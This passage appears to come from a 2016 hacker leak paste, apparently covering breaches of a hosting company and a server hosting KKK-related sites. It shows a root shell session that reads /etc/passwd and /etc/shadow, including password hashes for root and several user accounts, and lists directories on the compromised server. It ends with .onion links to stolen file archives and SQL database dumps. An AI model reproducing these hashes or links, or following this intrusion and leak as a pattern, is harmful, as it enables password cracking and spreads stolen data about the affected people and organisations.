  866. cpanel:x:201:201::/var/cpanel/userhomes/cpanel:/usr/local/cpanel/bin/noshell
  867. cpanelphpmyadmin:x:202:202::/var/cpanel/userhomes/cpanelphpmyadmin:/usr/local/cpanel/bin/noshell
  868. cpanelphppgadmin:x:203:203::/var/cpanel/userhomes/cpanelphppgadmin:/usr/local/cpanel/bin/noshell
  869. cpanelroundcube:x:204:204::/var/cpanel/userhomes/cpanelroundcube:/usr/local/cpanel/bin/noshell
  870. cpanelrrdtool:x:205:205::/var/cpanel/userhomes/cpanelrrdtool:/usr/local/cpanel/bin/noshell
  871. mailman:x:206:206::/usr/local/cpanel/3rdparty/mailman/mailman:/usr/local/cpanel/bin/noshell
  872. cpanellogin:x:496:494::/var/cpanel/userhomes/cpanellogin:/usr/local/cpanel/bin/noshell
  873. cpaneleximfilter:x:495:493::/var/cpanel/userhomes/cpaneleximfilter:/usr/local/cpanel/bin/noshell
  874. cpaneleximscanner:x:494:492::/var/cpanel/userhomes/cpaneleximscanner:/usr/local/cpanel/bin/noshell
  875. cpanelconnecttrack:x:493:491::/var/cpanel/userhomes/cpanelconnecttrack:/usr/local/cpanel/bin/noshell
  876. cpses:x:492:490::/var/cpanel/cpses:/sbin/nologin
  877. kkkcom:x:500:500::/home/kkkcom:/usr/local/cpanel/bin/noshell
  878. sotctrai:x:501:501::/home/sotctrai:/usr/local/cpanel/bin/jailshell
  879. sotctvc:x:502:502::/home/sotctvc:/usr/local/cpanel/bin/jailshell
  880. kkkpen6:x:504:504::/home/kkkpen6:/usr/local/cpanel/bin/jailshell
  881. american:x:505:505::/home/american:/bin/bash
  882. kkkradio:x:506:506::/home/kkkradio:/usr/local/cpanel/bin/noshell
  883. wpmedia:x:507:507::/home/wpmedia:/usr/local/cpanel/bin/noshell
  884. harrisonarkansas:x:508:508::/home/harrisonarkansas:/bin/bash
  885. clamav:x:509:509::/home/clamav:/sbin/nologin
  886. whiteradio:x:510:510::/home/whiteradio:/usr/local/cpanel/bin/jailshell
  887. root@sv1 [~]# cat /etc/shadow
  888. root:$6$4izKD95ssUtDEKEY$OlfGvM/Vam5HdbtT9R.bxRvUBe7S9oRGR9hCHkiUaF.j2gdJ3lh2O/9qIV0q9oUHqYo.E/wmXU2SfKw2.nYoa1:16827:0:99999:7:::
  889. bin:*:15628:0:99999:7:::
  890. daemon:*:15628:0:99999:7:::
  891. adm:*:15628:0:99999:7:::
  892. lp:*:15628:0:99999:7:::
  893. sync:*:15628:0:99999:7:::
  894. shutdown:*:15628:0:99999:7:::
  895. halt:*:15628:0:99999:7:::
  896. mail:*:15628:0:99999:7:::
  897. uucp:*:15628:0:99999:7:::
  898. operator:*:15628:0:99999:7:::
  899. games:*:15628:0:99999:7:::
  900. gopher:*:15628:0:99999:7:::
  901. ftp:*:15628:0:99999:7:::
  902. nobody:*:15628:0:99999:7:::
  903. dbus:!!:16763::::::
  904. vcsa:!!:16763::::::
  905. rpc:!!:16763:0:99999:7:::
  906. abrt:!!:16763::::::
  907. rpcuser:!!:16763::::::
  908. nfsnobody:!!:16763::::::
  909. haldaemon:!!:16763::::::
  910. ntp:!!:16763::::::
  911. saslauth:!!:16763::::::
  912. postfix:!!:16763::::::
  913. sshd:!!:16763::::::
  914. tcpdump:!!:16763::::::
  915. oprofile:!!:16763::::::
  916. nscd:!!:16763::::::
  917. named:!!:16763::::::
  918. mailnull:!!:16763::::::
  919. mysql:!!:16763::::::
  920. dovecot:!!:16763::::::
  921. dovenull:!!:16763::::::
  922. cpanel:*:16763::::::
  923. cpanelphpmyadmin:*:16763::::::
  924. cpanelphppgadmin:*:16763::::::
  925. cpanelroundcube:*:16763::::::
  926. cpanelrrdtool:*:16763::::::
  927. mailman:*:16763::::::
  928. cpanellogin:!!:16763::::::
  929. cpaneleximfilter:!!:16763::::::
  930. cpaneleximscanner:!!:16763::::::
  931. cpanelconnecttrack:!!:16763::::::
  932. cpses:!!:16763::::::
  933. kkkcom:$6$h.XE7tATzeTEXTc2$0bgqXG1ZfqXp6bUnZSQO6dw57DpbrXZi7.AqjXyJFeg4QZ1gQ4JlxROLVCGwq7tMg6QsTBt075C.4PhYUgHDi/:16763:0:99999:7:::
  934. sotctrai:$1$UDsXv17a$vlI/hMvWvrd7loTGydbYm1:16763:0:99999:7:::
  935. sotctvc:$6$.qQotTxu6nz8aGbW$bEwWcWyhyIsa8DqV8Q8E/sclXvZuyfcx4p1uvBGiDcl.os62z/B3/GKGurlKtJfOvwCMzucrSFC/Bo7kjHp3Y1:16763:0:99999:7:::
  936. kkkpen6:$1$USWrdUqZ$eBdcbfgLQy9o0s.EKxDER.:16763:0:99999:7:::
  937. american:$1$T91QSPab$CPlzITFSlr0VjTO9jsGln1:16764:0:99999:7:::
  938. kkkradio:$6$EWmjNAwjV0OTxLzQ$JwPMYH8JPJhoZZZbfmVxCBM4EEJ7r7uIJrArvVR6Rx5lvx.SmAdYMy82G4DGUJCDbwIqxoXs7e48qS8n9X5D10:16764:0:99999:7:::
  939. wpmedia:$1$fyze3CAj$2KjG60YDb2qf6feDdHMYN1:16764:0:99999:7:::
  940. harrisonarkansas:$6$DUoFnQgxKEjN/2w6$.k/el.mCl6FPaf4ics4lB4.cOqcgEXHhWsjf4spSS4w1K2XkbFJqLUPYuwlQ73yJHGovv6vIJJVSX5.hP6S7r1:16788:0:99999:7:::
  941. clamav:!!:16830:0:99999:7:::
  942. whiteradio:$6$UlVWUbs.bJwQ3fV6$h/8Sq7426Kn9trOXAPCmn/Jj9hdfArXBdLRVoCK2YH7gB4BbLaPRoWc.5.ZV08SpGVhbmYTb2H2rI2CS/fNAO0:16851:0:99999:7:::
  943. root@sv1 [~]# ls -la
  944. total 312
  945. dr-xr-x---. 19 root root 4096 Feb 25 01:35 ./
  946. drwxr-xr-x. 25 root root 4096 Feb 8 10:40 ../
  947. -rw-------. 1 root root 990 Feb 19 20:43 .accesshash
  948. -rw-------. 1 root root 1679 Nov 23 23:10 anaconda-ks.cfg
  949. -rw-------. 1 root root 15098 Feb 24 20:14 .bash_history
  950. -rw-------. 1 root root 3015 Jan 27 14:01 .bash_history.cpanel_ticket.7446277
  951. -rw-r--r--. 1 root root 18 May 20 2009 .bash_logout
  952. -rw-r--r--. 1 root root 176 May 20 2009 .bash_profile
  953. -rw-r--r--. 1 root root 176 Sep 22 2004 .bashrc
  954. -rw-------. 1 root root 45056 Jan 27 03:14 .bwusage.sqlite
  955. drwx------. 5 root root 4096 Jan 30 11:00 .cpanel/
  956. drwxr-xr-x. 4 root root 4096 Nov 24 13:54 cpanel3-skel/
  957. drwxr-xr-x. 3 root root 4096 Nov 24 02:34 .cpanm/
  958. drwx------. 4 root root 4096 Nov 24 02:47 .cpobjcache/
  959. -rw-r--r--. 1 root root 100 Sep 22 2004 .cshrc
  960. drwxr-xr-x. 2 root root 4096 Feb 24 14:59 .data/
  961. -rw-------. 1 root root 24 Nov 24 13:48 .forward
  962. drwx------. 2 root root 4096 Nov 24 02:35 .gnupg/
  963. drwx------. 2 root root 4096 Jan 27 14:30 .HttpRequest/
  964. -rw-r--r--. 1 root root 10 Nov 24 02:31 installer.lock
  965. -rw-r--r--. 1 root root 26505 Nov 23 23:10 install.log
  966. -rw-r--r--. 1 root root 7572 Nov 23 23:08 install.log.syslog
  967. drwx------. 2 root root 4096 Nov 25 06:51 .libnet-openssh-perl/
  968. drwx------. 6 root root 4096 Jan 27 14:30 .MirrorSearch/
  969. -rw-------. 1 root root 48 Nov 24 02:33 .my.cnf
  970. drwxr-xr-x. 4 root root 4096 Dec 2 04:23 perl5/
  971. -rw-r--r--. 1 root root 38475 Nov 24 18:58 php.ini.new
  972. -rw-r--r--. 1 root root 38475 Nov 24 18:58 php.ini.orig
  973. drwxr-----. 3 root root 4096 Jan 27 13:15 .pki/
  974. drwxr-xr-x. 2 root root 4096 Nov 24 03:42 public_ftp/
  975. drwxr-xr-x. 3 root root 4096 Nov 24 03:42 public_html/
  976. drwxr-xr-x. 2 root root 4096 Feb 23 02:20 .razor/
  977. -rw-------. 1 root root 1024 Feb 8 08:45 .rnd
  978. drwx------. 3 root root 4096 Nov 24 02:25 .spamassassin/
  979. drwx------. 2 root root 4096 Feb 24 15:14 .ssh/
  980. -rw-r--r--. 1 root root 129 Dec 3 2004 .tcshrc
  981. drwxr-xr-x. 3 root root 4096 Feb 23 02:19 tmp/
  982. -rw-------. 1 root root 2030 Nov 24 02:04 .viminfo
  983. root@sv1 [~]# ls -la /home/
  984. total 132
  985. drwx--x--x. 20 root root 4096 Feb 24 15:01 ./
  986. drwxr-xr-x. 25 root root 4096 Feb 8 10:40 ../
  987. -rw-r--r--. 1 root root 529 Nov 24 02:48 0_README_BEFORE_DELETING_VIRTFS
  988. drwx--x--x. 21 american american 4096 Jan 27 04:32 american/
  989. drwx--x--x. 2 clamav clamav 4096 Jan 30 11:02 clamav/
  990. drwxr-xr-x. 5 root root 4096 Nov 24 14:38 .cpan/
  991. drwxr-xr-x. 2 root root 4096 Nov 24 02:55 cPanelInstall/
  992. drwxr-xr-x. 3 root root 4096 Nov 24 18:55 .cpanm/
  993. drwx------. 3 root root 4096 Feb 23 02:20 .cpcpan/
  994. drwx------. 3 root root 4096 Nov 24 02:36 cpeasyapache/
  995. drwxr-xr-x. 2 root root 4096 Feb 24 17:23 .data/
  996. drwx--x--x. 11 harrisonarkansas harrisonarkansas 4096 Dec 18 21:11 harrisonarkansas/
  997. drwx--x--x. 14 kkkcom kkkcom 4096 Jan 27 04:32 kkkcom/
  998. drwx--x--x. 19 kkkpen6 kkkpen6 4096 Jan 27 04:32 kkkpen6/
  999. drwx--x--x. 17 kkkradio kkkradio 4096 Nov 25 14:14 kkkradio/
  1000. -rw-r--r--. 1 root root 25138 Nov 4 13:24 latest
  1001. drwx------. 2 root root 16384 Nov 23 22:58 lost+found/
  1002. -rw-------. 1 root root 7168 Feb 25 01:34 quota.user
  1003. drwx--x--x. 17 sotctrai sotctrai 4096 Jan 27 04:32 sotctrai/
  1004. drwx--x--x. 16 sotctvc sotctvc 4096 Jan 27 04:32 sotctvc/
  1005. drwx--x--x. 3 root root 4096 Nov 24 02:48 virtfs/
  1006. drwx--x--x. 12 whiteradio whiteradio 4096 Feb 19 20:44 whiteradio/
  1007. drwx--x--x. 25 wpmedia wpmedia 4096 Jan 27 04:32 wpmedia/
  1008. root@sv1 [~/.razor]# cd /home/kkkcom
  1009. root@sv1 [/home/kkkcom]# ls -la
  1010. total 80
  1011. drwx--x--x. 14 kkkcom kkkcom 4096 Jan 27 04:32 ./
  1012. drwx--x--x. 20 root root 4096 Feb 24 15:01 ../
  1013. lrwxrwxrwx. 1 kkkcom kkkcom 32 Nov 27 2014 access-logs -> /usr/local/apache/domlogs/kkkcom/
  1014. -rw-r--r--. 1 kkkcom kkkcom 18 Oct 16 2014 .bash_logout
  1015. -rw-r--r--. 1 kkkcom kkkcom 176 Oct 16 2014 .bash_profile
  1016. -rw-r--r--. 1 kkkcom kkkcom 124 Oct 16 2014 .bashrc
  1017. drwxr-xr-x. 2 kkkcom kkkcom 4096 Oct 19 03:08 cache/
  1018. -rw-------. 1 kkkcom kkkcom 28 Jan 1 2015 .contactemail
  1019. drwxr-xr-x. 2 kkkcom kkkcom 4096 Feb 23 02:20 .cpanel/
  1020. -rw-r-----. 1 kkkcom kkkcom 1 Apr 25 2015 cpbackup-exclude.conf
  1021. drwx------. 4 kkkcom kkkcom 4096 Nov 24 14:12 .cphorde/
  1022. drwxr-x---. 2 kkkcom mail 4096 Nov 27 2014 etc/
  1023. drwxr-x---. 2 kkkcom nobody 4096 Nov 27 2014 .htpasswds/
  1024. drwx------. 2 kkkcom kkkcom 4096 Feb 14 06:18 logs/
  1025. drwxr-x--x. 8 kkkcom kkkcom 4096 Nov 27 2014 mail/
  1026. drwxr-x---. 3 kkkcom kkkcom 4096 Nov 27 2014 public_ftp/
  1027. drwxr-x---. 4 kkkcom nobody 4096 Nov 28 2014 public_html/
  1028. drwxr-xr-x. 5 kkkcom kkkcom 4096 Oct 20 03:01 ssl/
  1029. drwxr-xr-x. 7 kkkcom kkkcom 4096 Nov 27 2014 tmp/
  1030. drwxr-xr-x. 3 kkkcom kkkcom 4096 Jan 27 04:32 var/
  1031. lrwxrwxrwx. 1 kkkcom kkkcom 11 Nov 27 2014 www -> public_html/
  1032. -rw-r--r--. 1 kkkcom kkkcom 658 Nov 10 06:27 .zshrc
  1033.  
  1034.  
  1035. ~[CTRL-Z]~ EOF & Mirrors
  1036.  
  1037. Staminus
  1038.  
  1039. FILES:
  1040. http://emqyrhqhxwbetyjb.onion/chatbot.tar.gz
  1041. http://emqyrhqhxwbetyjb.onion/lighttpd.tar.gz
  1042. http://emqyrhqhxwbetyjb.onion/main.tar.gz
  1043. http://emqyrhqhxwbetyjb.onion/openvpn.tar.gz
  1044. http://emqyrhqhxwbetyjb.onion/svn.tar.gz
  1045.  
  1046. SQL:
  1047. http://emqyrhqhxwbetyjb.onion/3-9-staminus2.sql
  1048. http://emqyrhqhxwbetyjb.onion/accountUpdate.sql
  1049. http://emqyrhqhxwbetyjb.onion/acctserver.sql
  1050. http://emqyrhqhxwbetyjb.onion/appliance_lan.sql
  1051. http://emqyrhqhxwbetyjb.onion/full.sql
  1052. http://emqyrhqhxwbetyjb.onion/ip_limit_history.sql
  1053. http://emqyrhqhxwbetyjb.onion/ip_limit_profile.sql
  1054. http://emqyrhqhxwbetyjb.onion/ip_limit.sql
  1055. http://emqyrhqhxwbetyjb.onion/sp.sql
  1056.  
  1057. Intreppid
  1058.  
  1059. FILES:
  1060. http://emqyrhqhxwbetyjb.onion/www2.tar.gz
  1061. SQL:
  1062. http://emqyrhqhxwbetyjb.onion/fucked.dump
  1063.  
  1064. KKK + Friends
  1065.  
  1066. FILES:
  1067. http://emqyrhqhxwbetyjb.onion/american.tar.gz
  1068. http://emqyrhqhxwbetyjb.onion/harrisonarkansas.tar.gz
  1069. http://emqyrhqhxwbetyjb.onion/kkkcom.tar.gz
  1070. http://emqyrhqhxwbetyjb.onion/kkkpen6.tar.gz
  1071. http://emqyrhqhxwbetyjb.onion/kkkradio.tar.gz
  1072. ____
  1073. v _( )
  1074. _ ^ _ v (___(__)
  1075. '_\V/ `
  1076. ' oX`
  1077. X v
  1078. X ~EOF~
  1079. X .
  1080. X \O/ -UNTIL NEXT TIME- |\
  1081. X.a##a. M |_\
  1082. .aa########a.>> __|__
  1083. .a################aa. \FTA/
  1084. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  1085. FUCK THEM ALL - 2016
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement